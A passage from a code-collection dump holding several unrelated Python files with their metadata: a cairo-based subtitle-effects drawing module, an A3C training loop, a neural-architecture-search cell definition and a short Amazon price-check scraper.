('AARRGGBB')\n @ccolor through CopyFrom, receives a cCairoColor object\n \"\"\"\n if number is not None:\n self.FromNumber(number)\n elif text:\n self.FromText(text)\n elif ccolor:\n self.CopyFrom(ccolor)\n elif components:\n self.a, self.r, self.g, self.b = components\n else:\n self.r = self.g = self.b = self.a = 1.0\n return\n\n def Pattern(self):\n \"\"\"Returns a cairo patter for usage in functions receiving one\n you can also use video.cf.ctx.set_source_rgba(a.r, a.g, a.b, a.a) directly\n but this syntax is way better, right?\"\"\"\n return 
cairo.SolidPattern(self.r, self.g, self.b, self.a)\n\n def FromText(self, color):\n \"\"\"Creates a color from another\n color may be either '&HAARRGGBB' or 'AARRGGBB'\n \"\"\"\n if color[0] == '&':\n color = color[1:]\n if color[0].lower() == 'h':\n color = color[1:]\n color.zfill(8)\n self.a = (255 - ord(color[:2].decode('hex'))) / 255.0\n self.b = ord(color[2:4].decode('hex')) / 255.0\n self.g = ord(color[4:6].decode('hex')) / 255.0\n self.r = ord(color[6:8].decode('hex')) / 255.0\n\n def FromNumber(self, color):\n \"\"\"Creates a color from another\n color is an integer: 31238231 or 0xAARRGGBB\"\"\"\n self.b = (color & 255) / 255.0\n color >>= 8\n self.g = (color & 255) / 255.0\n color >>= 8\n self.r = (color & 255) / 255.0\n color >>= 8\n self.a = color / 255.0\n\n def CopyFrom(self, other):\n \"\"\"Copies a color\n @other is a cCairoColor object\"\"\"\n self.r = other.r\n self.g = other.g\n self.b = other.b\n self.a = other.a\n\n def Interpolate(self, progress, other, inter=common.i_lineal):\n \"\"\"\n Linear interpolation of two colors\n\n :param progress:\n [0,1] interpolation factor/ratio\n 0 means the first color, 1 the second color\n values in between are interpolated\n :param other: color to interpolate to\n :type progress: double\n :type other: :class:`libs.draw.extra.cCairoColor`\n\n \"\"\"\n i = common.Interpolate\n self.r = i(progress, self.r, other.r, inter)\n self.g = i(progress, self.g, other.g, inter)\n self.b = i(progress, self.b, other.b, inter)\n self.a = i(progress, self.a, other.a, inter)\n\n\nclass cVector():\n \"\"\"Base cairo object class includes drawing utils for cairo\n it may be instanced @text or @figure or using the setters afterwards\n \"\"\"\n P_SOLID = 0\n P_TEXTURE = 1\n P_DEG_VERT = 2\n P_DEG_HOR = 3\n P_DEG_DIAG = 4\n P_DEG_RAD = 5\n P_AN_DEG_LIN = 6\n P_AN_DEG_RAD = 7\n P_COLORED_PATTERN = 8\n PART_BORDER = 0\n PART_FILL = 1\n PART_SHADOW = 2\n PART_PARTICLE = 3\n\n def __init__(self, text='', style=None, figure=None, parent=None, last_pos=None):\n \"\"\"Parameters\n @style cProperties object to inherit from\n @text creates an object from text\n @figure from ass shape\n @parent parent object\n \"\"\"\n from libs import asslib\n self.progress = 0.0\n self._end = 0\n self._start = 0\n self._dur = 0\n self._indice = 0\n self._parent = parent\n self._next_x = 0\n self._next_y = 0\n self.effect = 0\n self.textures = [None, None, None, None]\n self.original = asslib.cProperties(style)\n self.actual = asslib.cProperties(style)\n self.matrix = None\n self._UpdateMatrix()\n self._text = ''\n self.pointsw = None\n self._old_path = self.path = None\n self._pat_cache = None\n if figure:\n self.CreateFromFigure(figure)\n elif text is not None:\n self.SetText(text, last_pos=last_pos)\n return\n\n def _SetTextVertPos(self):\n \"\"\"Updates vertical align from the ass align\n it is recommended to use _SetTextProps instead\n \"\"\"\n props = self.original\n vert = ceil(props._align / 3.0)\n if vert == 1:\n props.pos_y = video.vi.height - props._marginv\n elif vert == 2:\n props.pos_y = (video.vi.height - props._line_height) / 2\n else:\n props.pos_y = props._marginv - props._y_bearing\n\n def _SetTextHorizPos(self):\n \"\"\"Updates horizontal align from the ass align\n it is recommended to use _SetTextProps instead\n 1=bottom, 2=mid, 3=top\n \"\"\"\n props = self.original\n horiz = props._align % 3\n if horiz == 1:\n props.pos_x = props._marginl\n elif horiz == 2:\n props.pos_x = (video.vi.width - props._width) / 2.0\n else:\n props.pos_x = video.vi.width - 
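`cCairoColor.FromNumber` above peels one byte per channel off a packed 0xAARRGGBB integer with masks and shifts. The same unpacking as a standalone function returning floats in [0, 1], in the order cairo expects:

def unpack_aarrggbb(color):
    # Split a 0xAARRGGBB integer into (r, g, b, a) floats in [0, 1],
    # mirroring cCairoColor.FromNumber above.
    b = (color & 255) / 255.0
    color >>= 8
    g = (color & 255) / 255.0
    color >>= 8
    r = (color & 255) / 255.0
    color >>= 8
    a = color / 255.0
    return r, g, b, a

# Fully opaque: r=0.0, g~0.5, b=1.0, a=1.0
print(unpack_aarrggbb(0xFF0080FF))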
props._width - props._marginr\n\n def _SetTextProps(self, lasts=None):\n \"\"\"Sets properties according to text\n used when the text is created\n (usually position and size)\n @lasts -> coordinates for the text to start\n @return -> coordinates for the next text [[TO-DO] - Check this stuff, it doesn't make much sense]\n\n \"\"\"\n ctx = video.cf.ctx\n props = self.original\n SetStyle(props)\n props._x_bearing, props._y_bearing, props._width, props._height, props._x_advance, props._y_advance = ctx.text_extents(self._text)\n props._ascent, props._descent, props._line_height, props._max_x_advance, props._max_y_advance = ctx.font_extents()\n if lasts:\n props.pos_x = lasts[0]\n props.pos_y = lasts[1]\n else:\n self._SetTextHorizPos()\n self._SetTextVertPos()\n if self._parent and props.angle:\n props.org_x = 0\n props.org_y = 0\n props._x_advance, props._y_advance = self._parent.matrix.transform_distance(props._x_advance, props._y_advance)\n else:\n props.org_x = props._width / 2.0\n props.org_y = -(props._line_height / 2.0) + props._descent\n self.actual.CopyAllFrom(props)\n self._next_x = props.pos_x + props._x_advance\n self._next_y = props.pos_y + props._y_advance\n\n def _SetPathProps(self):\n \"\"\"Sets props for the path\n it must be the active path\n \"\"\"\n o = self.original\n e = video.cf.ctx.path_extents()\n o._width = e[2] - e[0]\n o._height = o._line_height = e[3] - e[1]\n o._x_bearing = e[0]\n o._y_bearing = e[1]\n o.org_x = o._x_bearing + o._width / 2.0\n o.org_y = -(o._height / 2.0)\n self.actual.CopyAllFrom(o)\n\n def GetShape(self):\n \"\"\"\n Creates a string like 'm 13 13 13 31 b 31 31 13 31' used in ass subs\n this is for zheo, ass sucks, don't use it, seriously, do NEVER use it,\n just for you to know a little bit more about ass and useless stuff\n \"\"\"\n figura = ''\n lp = ''\n mapa = ['m ', 'l ', 'b ', 'c ']\n if self._old_path:\n for t, p in self._old_path:\n figura += lp\n if t < 3:\n lp = mapa[t]\n for coord in p:\n lp += str(int(round(coord))) + ' '\n\n mapa[0] = 'n '\n else:\n lp = ''\n mapa[0] = 'm '\n\n figura += ' c'\n return figura\n\n def CreateFromFigure(self, ass):\n \"\"\"SLOW - vector from ass shape\"\"\"\n arr = ass.lower().split(' ')\n ctx = video.cf.ctx\n ctx_funcs = (\n ctx.move_to,\n ctx.line_to,\n ctx.curve_to,\n ctx.close_path)\n\n def get(a, i):\n return [ float(a.pop(0) if a else 0.0) for x in xrange(i) ]\n\n ctx.new_path()\n t = 'm'\n while arr:\n if arr[0] in 'mnlbsc':\n t = arr.pop(0)\n if t == 'm' or t == 'n':\n ctx_funcs[3]()\n ctx_funcs[0](*get(arr, 2))\n elif t == 'l':\n ctx_funcs[1](*get(arr, 2))\n elif t == 'b' or t == 's':\n ctx_funcs[2](*get(arr, 6))\n\n ctx_funcs[3]()\n self._old_path = self.path = ctx.copy_path()\n self._SetPathProps()\n\n def _UpdateMatrix(self):\n a = self.actual\n self.matrix = CreateMatrix(a.pos_x + a.org_x, a.pos_y - a.org_y, a.org_x, a.org_y, a.angle, a.scale_x, a.scale_y, False)\n\n def _UpdateTextPath(self):\n SetStyle(self.original)\n ctx = video.cf.ctx\n ctx.new_path()\n ctx.text_path(self._text)\n self._old_path = self.path = ctx.copy_path()\n\n def SetText(self, text, last_pos=None):\n \"\"\"SLOW:\n Changes the text asociated to a vector\n @text used text\n It'll use the original properties but re-calculating position and stuff\n optional:\n @last_pos=None (x,y) coordinates of the last syllable\"\"\"\n self._text = text\n self._SetTextProps(last_pos)\n self._UpdateTextPath()\n\n def Deform(self, func):\n \"\"\"Deforms vector object\n @func is a function called once for each point group in the vector, 
receives the following params:\n self : Dialog you want to Deform\n tipo : Integer indicating the point type (0=move, 1=line, 2=curve, 3=close (from some cairo stuff))\n points : coordinates array\n returns a modified points array\n \"\"\"\n ctx = video.cf.ctx\n ctx_funcs = (\n ctx.move_to,\n ctx.line_to,\n ctx.curve_to)\n ctx.new_path()\n for t, p in self._old_path:\n if t < 3:\n p = func(self, t, p)\n ctx_funcs[t](*p)\n else:\n ctx.close_path()\n\n self.path = ctx.copy_path()\n\n def CompleteDeform(self, func):\n \"\"\"Like Deform but it only receives an object, it's expected to return just a coordinates array\n This leads to better control of the points\n \"\"\"\n ctx = video.cf.ctx\n ctx_funcs = (\n ctx.move_to,\n ctx.line_to,\n ctx.curve_to)\n ctx.new_path()\n for t, p in func(self, self._old_path):\n if t < 3:\n ctx_funcs[t](*p)\n else:\n ctx.close_path()\n\n self.path = ctx.copy_path()\n\n def __GroupPath(self, path):\n gpath = []\n thispath = []\n if not path:\n return [[(1, (0.0, 0.0))]]\n for i in path:\n if i[0] == 3:\n if thispath:\n gpath.append(thispath)\n thispath = []\n else:\n thispath.append(i)\n\n if thispath:\n gpath.append(thispath)\n return gpath\n\n def __NormalizePath(self, fg, tg):\n lastfp = fg[0]\n lasttp = tg[0]\n fromg = []\n tog = []\n for fp, tp in itertools.izip_longest(fg, tg, fillvalue=None):\n if not fp:\n fp = lastfp[:]\n if not tp:\n tp = lasttp[:]\n tfp, ttp = fp[0], tp[0]\n if tfp == 2 or ttp == 2:\n if tfp < 2:\n fpp = fp[1]\n fp = (\n 2, (lastfp[1][(-2)], lastfp[1][(-1)], fpp[0], fpp[1], fpp[0], fpp[1]))\n elif ttp < 2:\n tpp = tp[1]\n tp = (\n 2, (lasttp[1][(-2)], lasttp[1][(-1)], tpp[0], tpp[1], tpp[0], tpp[1]))\n fromg.append(fp)\n tog.append(tp)\n lastfp = fp\n lasttp = tp\n\n return (\n fromg, tog)\n\n def __NormalizePathGroups(self, a, b):\n lastf = a[0][:]\n lastt = b[0][:]\n frompg = []\n topg = []\n for fg, tg in itertools.izip_longest(a, b, fillvalue=None):\n if not fg:\n fg = lastf[:]\n a.append(lastf)\n if not tg:\n tg = lastt[:]\n b.append(lastf)\n lastf, lastt = self.__NormalizePath(fg, tg)\n frompg.append(lastf)\n topg.append(lastt)\n\n return (\n frompg, topg)\n\n def __FlattenPathGroup(self, path):\n for g in path:\n g.append((3, ()))\n\n return tuple(itertools.chain.from_iterable(path))\n\n def __CreateDiffPath(self, other):\n fgp = self.__GroupPath(self._old_path)\n tgp = self.__GroupPath(other.path)\n fgp, tgp = self.__NormalizePathGroups(fgp, tgp)\n self.__from_path = self.__FlattenPathGroup(fgp)\n self.__to_path = self.__FlattenPathGroup(tgp)\n\n def Morph(self, other):\n if not self._text:\n return\n if not hasattr(self, '__from_path'):\n self.__CreateDiffPath(other)\n ctx = video.cf.ctx\n ctx_funcs = (\n ctx.move_to,\n ctx.line_to,\n ctx.curve_to)\n ctx.new_path()\n for fcom, tcom, x in zip(self.__from_path, self.__to_path, itertools.count(1)):\n t = fcom[0]\n fpoints = fcom[1]\n tpoints = tcom[1]\n if t < 3:\n p = [ common.LERP(self.progress, i, j) for i, j in zip(fpoints, tpoints) ]\n ctx_funcs[t](*p)\n else:\n ctx.close_path()\n\n self.path = ctx.copy_path()\n\n def Restore(self):\n \"\"\"Restores a vector's style\"\"\"\n self.actual.CopyFrom(self.original)\n self.path = self._old_path\n\n def PaintWithCache(self, background=False, matrix=None):\n \"\"\"Uses cache to draw a vector.\n It's only created the first time you call it, it uses the cache afterwards\n optional\n @background=False Boolean, decides if the text receives the background\n @matrix=None transform matrix for EndGroup\n \"\"\"\n if self._pat_cache:\n ctx = 
video.cf.ctx\n ctx.set_source(self._pat_cache)\n ctx.paint()\n else:\n self._pat_cache = self.Paint(background, matrix)\n return self._pat_cache\n\n def DeleteCache(self):\n self._pat_cache = None\n return\n\n def Paint(self, background=False, matrix=None, matrix2=None):\n \"\"\"Draws a vector using current style.\n optional:\n @background=False Boolean, decides if the text receives the background\n @matrix=None -vector's- transform matrix\n @matrix2=None transform matrix for EndGroup\n \"\"\"\n a = self.actual\n ctx = video.cf.ctx\n advanced.StartGroup(background)\n if matrix:\n self.matrix = matrix\n else:\n self._UpdateMatrix()\n ctx.set_matrix(self.matrix)\n ctx.new_path()\n ctx.append_path(self.path)\n if a.border:\n ctx.set_line_width(a.border)\n basic.sources[a.mode_border](self, a.color3, 0)\n ctx.stroke_preserve()\n basic.sources[a.mode_fill](self, a.color1, 1)\n ctx.fill()\n pat = advanced.EndGroup(0.0, matrix2)\n basic.sources[a.mode_shadow](self, a.color4, 2)\n pat = advanced.Shadow(pat, a.shadow, a.shad_x, a.shad_y)\n ctx.identity_matrix()\n return pat\n\n def PaintReference(self, matrix=None):\n \"\"\"Draws the vector reference points, note that some transforms may not be possible\"\"\"\n ctx = video.cf.ctx\n if matrix:\n self.matrix = matrix\n else:\n self._UpdateMatrix()\n ctx.set_matrix(self.matrix)\n ctx.rectangle(*self.Box())\n ctx.set_source_rgba(1, 0, 1, 1)\n ctx.stroke()\n ctx.arc(0, 0, 4, 0, 6.283)\n ctx.set_source_rgba(0, 1, 0, 1)\n ctx.fill()\n ctx.set_source_rgba(0, 1, 1, 1)\n a = self.actual\n ctx.arc(a.org_x, a.org_y, 3, 0, 6.283)\n ctx.fill()\n ctx.identity_matrix()\n\n def Box(self):\n \"\"\"Returns the bounding box with 4 components (x,y, width, height), values\n relative to vector's 0,0 point (baseline). Not valid for deformed paths,\n in that case you should use ctx.path_extents\n \"\"\"\n o = self.original\n bord = self.actual.border\n return (\n -o._x_bearing - bord, -o._height - bord, o._x_bearing + o._width + bord * 2, o._height + o._descent + bord * 2)\n\n def Center(self):\n \"\"\"\n Returns a vector's center\n Relative to the screen\"\"\"\n x = self.actual.pos_x + self.original._width / 2.0\n y = self.actual.pos_y - self.original._height / 2.0\n return (x, y)\n\n def Move(self, from_, to, inter=common.i_lineal):\n \"\"\"\n Animates the movement from the `from` position to the `to` position\n\n :param from: (x,y)\n :param to: (x,y)\n \"\"\"\n self.actual.pos_x = common.Interpolate(self.progress, from_[0], to[0], inter)\n self.actual.pos_y = common.Interpolate(self.progress, from_[1], to[1], inter)\n\n def MoveTo(self, dx, dy, inter=common.i_lineal):\n \"\"\"Animates movement back to the original position -CHECK THIS-\n @dx, dy position relative to origin\n \"\"\"\n org = self.original\n px = org.pos_x\n py = org.pos_y\n self.Move((px, py), (dx + px, dy + py), inter)\n\n def MoveFrom(self, dx, dy, inter=common.i_lineal):\n \"\"\"Animates the movement of a vector to the given point from its original position\n @dx, dy final position\n \"\"\"\n org = self.original\n px = org.pos_x\n py = org.pos_y\n self.Move((px + dx, py + dy), (px, py), inter)\n\n def Fade(self, from_, to, inter=common.i_lineal):\n \"\"\"Animated fade of a vector\n @from_ float for initial value\n @to float for final value\n both of them [0-1]\n \"\"\"\n self.Alpha(common.Interpolate(self.progress, from_, to, inter))\n\n def Alpha(self, alpha):\n \"\"\"Specifies alpha, for all colors\n @alpha float value for alpha channel, [0-1]\n \"\"\"\n self.actual.color1.a = self.actual.color2.a = 
self.actual.color3.a = self.actual.color4.a = alpha\n\n def Rotate(self, from_, to, inter=common.i_lineal):\n \"\"\"Animates vector rotation\n @from_ initial angle, radians\n @to final angle, radians\n \"\"\"\n self.actual.angle = common.Interpolate(self.progress, from_, to, inter)\n\n def Scale(self, from_, to_, inter=common.i_lineal):\n \"\"\"Animates vector scaling\n @from_ initial scale\n @to_ final scale\n both of them are float, 1 is default, natural scale; >1 is bigger; <1 is smaller\n \"\"\"\n self.actual.scale_x = self.actual.scale_y = common.Interpolate(self.progress, from_, to_, inter)\n\n def Shake(self, amplitude=4):\n \"\"\"\n Creates a shake from the position\n @amplitude of the movement in pixels\n \"\"\"\n self.actual.pos_x = self.original.pos_x + common.Interpolate(self.progress, -amplitude, amplitude, common.i_rand)\n self.actual.pos_y = self.original.pos_y + common.Interpolate(self.progress, -amplitude, amplitude, common.i_rand)\n\n def Wiggle(self, amplitude=4, frequency=2):\n \"\"\"\n Movement between random points\n @amplitude of the movement in pixels\n @frequency number of points\n \"\"\"\n if self.pointsw is None:\n self.pointsw = []\n self.pointsw.append((0, 0))\n for i in range(frequency):\n randomx = common.LERP(random(), -amplitude, amplitude)\n randomy = common.LERP(random(), -amplitude, amplitude)\n self.pointsw.append((randomx, randomy))\n self.pointsw.append((0, 0))\n\n x, y = common.RanmaBezier(self.progress, self.pointsw)\n self.actual.pos_x = self.original.pos_x + x\n self.actual.pos_y = self.original.pos_y + y\n return (x, y)\n\n def LoadTexture(self, filename, part=PART_BORDER, extend=cairo.EXTEND_REPEAT):\n \"\"\"This loads texture for every drawing function\n @filename .png filename\n @part what is it for? (0=outline, 1=fill, 2=shadow, 3=particles)\n (or .PART_BORDER .PART_FILL .PART_SHADOW, .PART_PARTICULAS) <- TODO-CHECK THIS\n @extend type of extend for cairo\n \"\"\"\n t = LoadTexture(filename, extend)\n self.textures[part] = t\n self.MoveTexture(pos_x=0, pos_y=-self.original._ascent, part=part)\n a = self.actual\n o = self.original\n if part == self.PART_BORDER:\n o.mode_border = a.mode_border = self.P_TEXTURE\n elif part == self.PART_FILL:\n o.mode_fill = a.mode_fill = self.P_TEXTURE\n elif part == self.PART_SHADOW:\n o.mode_shadow = a.mode_shadow = self.P_TEXTURE\n elif part == self.PART_PARTICLE:\n o.mode_particle = a.mode_particle = self.P_TEXTURE\n\n def MoveTexture(self, pos_x, pos_y, org_x=0, org_y=0, angle=0, scale_x=1, scale_y=1, part=0):\n self.textures[part].set_matrix(CreateMatrix(pos_x, pos_y, org_x, org_y, angle, scale_x, scale_y, inverse=True))\n\n def CreateParticles(self, texture=None, scale=1.0, alpha_min=0.2, vertical=True, mode=0):\n \"\"\"Extremely SLOW\n parameters\n @texture -> pattern with the texture\n optional\n @scale=1.0 -> scale wanted\n @alpha_min=0.2 -> minimum alpha threshold [0-255] <- TODO- CHECK THIS\n @vertical=True -> boolean, sets order for particle creation, True = Vertical, False = Horizontal\n @mode=0 -> particle mode\n \"\"\"\n if not texture:\n texture = self.textures[3]\n x1, y1, x2, y2 = map(int, self.Box())\n a = self.actual\n x1 += int(a.pos_x - a.border)\n x2 += int(a.pos_x + a.border)\n y1 += int(a.pos_y - a.border)\n y2 += int(a.pos_y + a.border)\n box = (\n x1, y1, x2, y2)\n advanced.StartGroup()\n self.Paint()\n parts = advanced.CreateParticles(box, texture, scale, alpha_min, vertical, mode)\n advanced.EndGroup(opacity=0.0)\n return parts\n\n def PaintReflection(self, height=None):\n 
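`Move`, `Fade`, `Rotate` and `Scale` above all reduce to a single `common.Interpolate` call driven by the vector's [0, 1] `progress`. The `common` module is not part of this file, but in the linear case the call is plain LERP; a sketch under that assumption, with the easing curve defaulting to identity:

def lerp(progress, start, end):
    # Linear interpolation: progress 0.0 returns start, 1.0 returns end.
    return start + (end - start) * progress

def interpolate(progress, start, end, easing=lambda t: t):
    # Plausible shape of common.Interpolate: remap progress through an
    # easing curve, then LERP. The easing signature is an assumption.
    return lerp(easing(progress), start, end)

assert interpolate(0.5, 0.0, 10.0) == 5.0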
\"\"\"@height : pixel height for gradient, etc\"\"\"\n posy = self.actual.pos_y\n alto_linea = self.original._line_height\n descent = self.original._descent\n height = height or self.original._height\n advanced.StartGroup()\n self.Paint()\n advanced.fBlur()\n mt = CreateMatrix(org_y=posy - self.actual.org_y, pos_y=posy + alto_linea + descent, scale_y=-1)\n pat = advanced.EndGroup(0.0, matrix=mt)\n video.cf.ctx.set_source(pat)\n lineal = cairo.LinearGradient(0, posy + height, 0, posy + height * 2.0)\n lineal.add_color_stop_rgba(1, 0, 0, 0, 0)\n lineal.add_color_stop_rgba(0, 1, 1, 1, 1)\n video.cf.ctx.mask(lineal)\n\n\ndef DemultipyAlpha(b, g, r, a):\n \"\"\"\n @b, g, r, a\n Todos los valores de 0 a 255\"\"\"\n return (\n Demult(b, a), Demult(g, a), Demult(r, a), a)\n\n\ndef D1(x):\n return x / 255.0\n\n\ndef D2(x):\n return (x + 0.5) / 256.0\n\n\ndef Demult(x, a):\n return common.ClampB(int((x * a - 1) / 254))\n\n\ndef DuplicateSurface(surface):\n vi = video.vi\n sfc2 = surface.create_similar(cairo.CONTENT_COLOR_ALPHA, vi.width, vi.height)\n ctx2 = cairo.Context(sfc2)\n ctx2.set_source_surface(surface)\n ctx2.set_operator(cairo.OPERATOR_SOURCE)\n ctx2.paint()\n return sfc2\n\n\ndef CopyTarget():\n return DuplicateSurface(video.cf.ctx.get_group_target())","sub_path":"pycfiles/kafx-1.6.2-py2.7/extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":27943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"634226512","text":"from __future__ import division\nfrom setproctitle import setproctitle as ptitle\nimport torch\nimport torch.optim as optim\nfrom environment import *\nfrom utils import ensure_shared_grads, EspTracker\nfrom models.models import *\nfrom player_util import Agent\nfrom torch.autograd import Variable\nfrom Utils.Logger import Logger\n\nimport numpy as np\nimport time\n\ndef train (rank, args, shared_model, optimizer, env_conf, datasets=None):\n if args.deploy:\n return\n ptitle('Train {0}: {1}'.format(args.env, rank))\n print ('Start training agent: ', rank)\n \n if rank == 0:\n logger = Logger (args.log_dir [:-1] + '_losses/')\n train_step = 0\n\n gpu_id = args.gpu_ids[rank % len(args.gpu_ids)]\n env_conf [\"env_gpu\"] = gpu_id\n torch.manual_seed(args.seed + rank)\n if gpu_id >= 0:\n torch.cuda.manual_seed(args.seed + rank)\n\n raw_list, gt_lbl_list = datasets\n env = EM_env (raw_list, env_conf, type=\"train\", gt_lbl_list=gt_lbl_list, seed=args.seed + rank)\n\n if optimizer is None:\n if args.optimizer == 'RMSprop':\n optimizer = optim.RMSprop (shared_model.parameters (), lr=args.lr)\n if args.optimizer == 'Adam':\n optimizer = optim.Adam (shared_model.parameters (), lr=args.lr, amsgrad=args.amsgrad)\n\n player = Agent (None, env, args, None)\n player.gpu_id = gpu_id\n player.model = get_model (args, args.model, env.observation_space.shape, args.features, \n atrous_rates=args.atr_rate, num_actions=2, split=args.data_channel, gpu_id=gpu_id, multi=args.multi)\n player.state = player.env.reset ()\n player.state = torch.from_numpy (player.state).float ()\n\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n player.state = player.state.cuda ()\n player.model = player.model.cuda ()\n player.model.train ()\n\n if rank == 0:\n eps_reward = 0\n pinned_eps_reward = 0\n\n while True:\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n player.model.load_state_dict (shared_model.state_dict ())\n else:\n player.model.load_state_dict (shared_model.state_dict ())\n \n if player.done:\n player.eps_len = 0\n\n if rank 
== 0:\n if train_step % args.train_log_period == 0 and train_step > 0:\n print (\"train: step\", train_step, \"\\teps_reward\", eps_reward)\n if train_step > 0:\n pinned_eps_reward = player.env.sum_reward.mean ()\n eps_reward = 0\n\n if args.lstm_feats:\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n player.cx, player.hx = player.model.lstm.init_hidden (batch_size=1, use_cuda=True)\n else:\n player.cx, player.hx = player.model.lstm.init_hidden (batch_size=1, use_cuda=False)\n elif args.lstm_feats:\n player.cx = Variable (player.cx.data)\n player.hx = Variable (player.hx.data)\n\n for step in range(args.num_steps):\n \n if rank < args.lbl_agents:\n player.action_train (use_lbl=True) \n else:\n player.action_train () \n\n if rank == 0:\n eps_reward = player.env.sum_reward.mean ()\n if player.done:\n break\n\n if player.done:\n state = player.env.reset (player.model, gpu_id)\n player.state = torch.from_numpy (state).float ()\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n player.state = player.state.cuda ()\n\n R = torch.zeros (1, 1, env_conf [\"size\"][0], env_conf [\"size\"][1])\n if args.lowres:\n R = torch.zeros (1, 1, env_conf [\"size\"][0] // 2, env_conf [\"size\"][1] // 2)\n\n if not player.done:\n if args.lstm_feats:\n value, _, _ = player.model((Variable(player.state.unsqueeze(0)), (player.hx, player.cx)))\n else:\n value, _ = player.model(Variable(player.state.unsqueeze(0)))\n R = value.data\n\n if gpu_id >= 0:\n with torch.cuda.device(gpu_id):\n R = R.cuda()\n\n player.values.append(Variable(R))\n policy_loss = 0\n value_loss = 0\n \n gae = torch.zeros(1, 1, env_conf [\"size\"][0], env_conf [\"size\"][1])\n if args.lowres:\n gae = torch.zeros (1, 1, env_conf [\"size\"][0] // 2, env_conf [\"size\"][1] // 2)\n if gpu_id >= 0:\n with torch.cuda.device(gpu_id):\n gae = gae.cuda()\n R = Variable(R)\n\n for i in reversed(range(len(player.rewards))):\n if gpu_id >= 0:\n with torch.cuda.device (gpu_id):\n reward_i = torch.tensor (player.rewards [i]).cuda ()\n else:\n reward_i = torch.tensor (player.rewards [i])\n\n R = args.gamma * R + reward_i\n advantage = R - player.values[i]\n value_loss = value_loss + (0.5 * advantage * advantage).mean ()\n delta_t = player.values[i + 1].data * args.gamma + reward_i - player.values[i].data\n gae = gae * args.gamma * args.tau + delta_t\n if args.noisy:\n policy_loss = policy_loss - \\\n (player.log_probs[i] * Variable(gae)).mean ()\n else: \n policy_loss = policy_loss - \\\n (player.log_probs[i] * Variable(gae)).mean () - \\\n (args.entropy_alpha * player.entropies[i]).mean ()\n\n\n player.model.zero_grad ()\n sum_loss = (policy_loss + value_loss)\n\n sum_loss.backward ()\n ensure_shared_grads (player.model, shared_model, gpu=gpu_id >= 0)\n optimizer.step ()\n player.clear_actions ()\n\n if rank == 0:\n train_step += 1\n if train_step % args.log_period == 0 and train_step > 0:\n log_info = {\n 'train: value_loss': value_loss, \n 'train: policy_loss': policy_loss, \n 'train: eps reward': pinned_eps_reward,\n }\n\n if \"EX\" in args.model:\n log_info [\"cell_prob_loss\"] = cell_prob_loss\n\n for tag, value in log_info.items ():\n logger.scalar_summary (tag, value, train_step)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"513976342","text":"import tensorflow as tf\n\nfrom deephyper.search.nas.model.baseline.util.struct import (create_seq_struct,\n create_struct_full_skipco)\nfrom 
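The reversed loop over `player.rewards` above is the standard generalized-advantage-estimation recursion: a discounted return R feeds the value loss, and a (gamma, tau)-discounted sum of TD errors feeds the policy loss. A scalar sketch of the same recursion with plain floats (the training code runs it on per-pixel reward tensors on the GPU):

def gae_returns(rewards, values, bootstrap, gamma=0.99, tau=1.0):
    # values must hold len(rewards) + 1 entries, with values[-1] == bootstrap,
    # matching player.values after the bootstrap value is appended above.
    R = bootstrap
    gae = 0.0
    out = []
    for i in reversed(range(len(rewards))):
        R = gamma * R + rewards[i]
        delta_t = rewards[i] + gamma * values[i + 1] - values[i]
        gae = gae * gamma * tau + delta_t
        out.append((R, gae))
    return list(reversed(out))

# Toy episode: two unit rewards, zero value estimates, terminal bootstrap 0.
print(gae_returns([1.0, 1.0], [0.0, 0.0, 0.0], bootstrap=0.0))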
deephyper.search.nas.model.space.block import Block\nfrom deephyper.search.nas.model.space.cell import Cell\nfrom deephyper.search.nas.model.space.node import Node\nfrom deephyper.search.nas.model.space.op.basic import Connect\nfrom deephyper.search.nas.model.space.op.op1d import (Conv1D, Dense, Identity,\n MaxPooling1D,\n dropout_ops)\n\n\ndef create_cell_1(input_nodes):\n \"\"\"Create a cell with convolution.\n\n Args:\n input_nodes (list(Node)): a list of input_nodes for this cell.\n\n Returns:\n Cell: the corresponding cell.\n \"\"\"\n cell = Cell(input_nodes)\n\n def create_conv_block(input_nodes):\n # first node of block\n n1 = Node('N1')\n for inpt in input_nodes:\n n1.add_op(Connect(cell.graph, inpt, n1))\n\n def create_conv_node(name):\n n = Node(name)\n n.add_op(Identity())\n n.add_op(Conv1D(filter_size=3, num_filters=16))\n n.add_op(Conv1D(filter_size=5, num_filters=16))\n n.add_op(MaxPooling1D(pool_size=3, padding='same'))\n n.add_op(MaxPooling1D(pool_size=5, padding='same'))\n return n\n # second node of block\n n2 = create_conv_node('N2')\n\n n3 = create_conv_node('N3')\n\n block = Block()\n block.add_node(n1)\n block.add_node(n2)\n block.add_node(n3)\n\n block.add_edge(n1, n2)\n block.add_edge(n2, n3)\n return block\n\n block1 = create_conv_block(input_nodes)\n block2 = create_conv_block(input_nodes)\n block3 = create_conv_block(input_nodes)\n\n cell.add_block(block1)\n cell.add_block(block2)\n cell.add_block(block3)\n\n cell.set_outputs()\n return cell\n\ndef create_structure(input_shape=(2,), output_shape=(1,), num_cells=2):\n return create_struct_full_skipco(\n input_shape,\n output_shape,\n create_cell_1,\n num_cells)\n","sub_path":"candlepb/Combo/models/candle_conv_mlp_1.py","file_name":"candle_conv_mlp_1.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} {"seq_id":"137890247","text":"import requests\nfrom bs4 import BeautifulSoup\n\nrequest = requests.get('https://www.amazon.com/gp/product/B01F64QL7K/')\ncontent = request.content\nsoup = BeautifulSoup(content, \"html.parser\")\nelement = soup.find(\"span\", {\"id\": \"priceblock_ourprice\"})\nstring_price = element.text.strip()\nprice_without_symbol = string_price[1:]\n\nprice = float(price_without_symbol)\n\nif price < 70:\n print(\"The price has lowered from your purchase price. Contact customer service for a refund of the difference.\")\nelse:\n print(\"The price is the same or higher than when you purchased. Be happy you purchased when you did.\")\n\nprint(\"The current price is {}.\".format(string_price))\n# $74.99\n\n","sub_path":"src/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} 